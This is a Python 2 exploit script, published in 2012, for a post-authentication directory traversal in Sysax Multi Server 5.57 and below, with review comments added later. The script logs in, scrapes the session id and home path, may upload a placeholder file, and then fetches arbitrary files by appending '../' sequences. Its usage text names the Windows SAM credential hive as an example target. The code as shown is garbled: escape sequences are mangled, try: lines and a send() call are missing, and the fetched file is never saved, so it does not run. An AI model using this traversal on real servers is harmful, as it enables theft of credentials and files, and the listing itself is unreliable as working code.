# Title : Sysax <= 5.57 Directory Traversal
# Published : 2012-04-03
# Author :
#Title: Sysax Multi Server <= 5.57 Directory Traversal Tool (Post Auth)
#Author: Craig Freyman (@cd1zz)
#Tested on: XP SP3 32bit and Server 2003 SP2 32bit
#Date Discovered: March 27, 2012
#Vendor Contacted: March 29, 2012
#Vendor Response: April 3, 2012	
#Vendor Fixed: (Currently working on fix, check my site for update)
#Details: http://www.pwnag3.com/2012/04/sysax-directory-traversal-exploit.html

import socket,sys,time,re,base64,urllib

def main():
	"""Authenticate to the Sysax web UI and locate the session id and home path.

	Sends the hand-built login POST, reads the response page, and stores two
	regex matches in the module globals ``sid`` (the 40-character session id)
	and ``path`` (the user's ``file=`` home directory) for dirtrav() to use.
	Reads the module globals ``user``, ``password``, ``target``, ``port`` and
	``getfile`` that the ``__main__`` block assigns.

	NOTE(review): as reproduced here the listing does not parse -- escape
	sequences look mangled ("rn", "n", "x0a") and the ``try:`` line before
	the socket setup is absent -- so the comments below describe the evident
	intent rather than verified behaviour.
	"""
	#base64 encode the provided creds
	# ``fd`` form field = base64(user + separator + password).  Note that
	# base64.encodestring() appends a trailing newline to its output.
	creds = base64.encodestring(user+"x0a"+password)

	print "n"
	print "****************************************************************************"
	print "       Sysax Multi Server <= 5.57 Directory Traversal Tool (Post Auth)      "
	print "     	  	         by @cd1zz www.pwnag3.com                          "
	print "	        Getting "+getfile+" from " + target + " on port " + str(port) 
	print "****************************************************************************"

	#setup post for login
	# Raw HTTP/1.1 request assembled by hand.  Content-Length is fixed at 15,
	# but the body ("fd=" + creds + two newlines) grows with the credential
	# length, so the header is wrong for most inputs.  The Host header is
	# empty and the URL is placed on its own line, which is not valid HTTP.
	login = "POST /scgi?sid=0&pid=dologin HTTP/1.1rn"
	login += "Host: rn"
	login += "http://"+target+"/scgi?sid=0&pid=dologinrn"
	login += "Content-Type: application/x-www-form-urlencodedrn"
	login += "Content-Length: 15rnrn"
	login += "fd="+creds+"nn"

	#send post and login creds
	# Only connect() is visible here; no send() of ``login`` appears between
	# the connect and the recv loop below.  On a connection failure the
	# error is printed and execution simply continues with an unusable socket.
	# The socket ``r`` is never closed.
		r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
		r.connect((target, port))
		print "[*] Logging in"
	except Exception, e:
		print "[-] Could not login"
		print e
	#loop the recv sock so we get the full page
	# Accumulates until "</html>" is seen.  If the peer closes the connection
	# first, recv() returns '' on every call and this loop never terminates.
	page = ''	
	fullpage = ''	
	while "</html>" not in fullpage:
		page = r.recv(4096)
		fullpage += page

	#regex the sid from the page
	# sid.group(0) includes the "sid=" prefix and is spliced verbatim into
	# later requests.
	global sid
	sid = re.search(r'sid=[a-zA-Z0-9]{40}',fullpage,re.M)
	if sid is None:
		# Reports the failure but does not stop; sid.group(0) further down
		# would then raise AttributeError.
		print "[x] Could not login. User and pass correct?"

	#regex to find user's path
	# Looks for a "file=<drive>:...$" fragment in the listing; the escaping
	# of the backslash after the drive letter looks mangled as reproduced.
	print "[*] Finding your home path"
	global path
	path = re.search(r'file=[a-zA-Z]:\[\.a-zA-Z_0-9 ]{1,255}[\$]',fullpage,re.M)

	#if that doesn't work, try to upload a file and check again
	# An empty listing yields no "file=" fragment, so the script uploads an
	# empty file.txt purely to make one appear in the next listing.
	if path is None:
		print "[-] No files found, I will try to upload one for you."
		print "[-] If you don't have rights to do this, it will fail."

		# Multipart body with a hard-coded boundary and Content-Length (219);
		# the quotes on the Content-Disposition line are unescaped as printed.
		upload = "POST /scgi?"+str(sid.group(0))+"&pid=uploadfile_name1.htm HTTP/1.1rn"
		upload += "Host:rn"
		upload += "Content-Type: multipart/form-data; boundary=---------------------------97336096252362005297691620rn"
		upload += "Content-Length: 219rnrn"
		upload += "-----------------------------97336096252362005297691620rn"
		upload += "Content-Disposition: form-data; name="upload_file"; filename="file.txt"rn"
		upload += "Content-Type: text/plainrn"
		upload += "-----------------------------97336096252362005297691620--rnrn"

		# Second socket ``u``, also never closed; same non-terminating recv
		# loop as above if the server closes early.
		u = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
		u.connect((target, port))
		u.send(upload + "rn")
		page = ''
		fullpage = ''	
		while "</html>" not in fullpage:
			page = u.recv(4096)
			fullpage += page
		# Drive-letter class here is [a-zA-Z0-9], unlike the first search.
		path = re.search(r'file=[a-zA-Z0-9]:\[\.a-zA-Z_0-9 ]{1,255}[\$]',fullpage,re.M)
		if path is None:
			print "n[x] It failed, you probably don't have rights to upload."
			print "[x] Please retry the script a few times."
			print "[x] You need at least one file in the directory because we need" 
			print "[x] to append our directory traversal to the end of your path."
	# Reached even when ``path`` is still None, in which case .group(0)
	# raises AttributeError instead of the friendlier messages above.
	print "[+] Got it => " + path.group(0) 

def dirtrav():
	"""Request ``getfile`` through the traversal URL and prompt for a save name.

	Uses the module globals ``target``, ``sid``, ``path`` and ``getfile``
	left by main().  The ``file=`` parameter is the discovered home path with
	"../" segments appended -- that appended sequence in the query string of
	an /scgi request is what a request log or filter rule would key on.

	NOTE(review): the ``try:`` line before urlopen() is absent as reproduced.
	"""
	#here is the dir trav 
	# ``getfile`` is inserted without URL encoding; path.group(0) ends with
	# the "$" character matched by main()'s regex.
	url = "http://"+target+"/scgi?"+str(sid.group(0))+"&"+path.group(0)+"../../../../../../../"+getfile
		retrieved_file = urllib.urlopen(url)
		filename = raw_input("[+] Got your file. What file name do you want to save it as?  ")
		# ``output`` is opened for writing but nothing is written to it and it
		# is never closed, so the response body is discarded and an empty
		# file is left on disk.  The name comes straight from the prompt.
		output = open(filename,'wb')
		print "[*] Done!"
	except Exception, e:
		# Any failure (unreachable host, server error, bad path) lands here;
		# the URL is echoed so the operator can inspect it.
		print "[x] Either the file doesn't exist or you mistyped it. Error below:"
		print "[x] You can also try to browse this site manually:"
		print "[x] " + url
		print e

def keepgoing():
	"""Prompt for further file names until the answer is anything but "y".

	Rebinds the module global ``getfile`` on every iteration but, as written,
	never calls dirtrav(), so each new value is collected and not used.
	"""
	cont = raw_input("[*] Do you want another file (y/n)? ")
	while cont == "y":
		global getfile
		getfile = raw_input("[*] Enter the location of the new file: ")
		cont = raw_input("[*] Do you want another file (y/n)? ")
if __name__ == '__main__':
	if len(sys.argv) != 6:
		print "[+] Usage: ./filename <Target IP> <Port> <User> <Password> <File>"
		print "[+] File examples => windows/repair/sam or boot.ini"

	target, port, user, password, getfile = sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], sys.argv[5]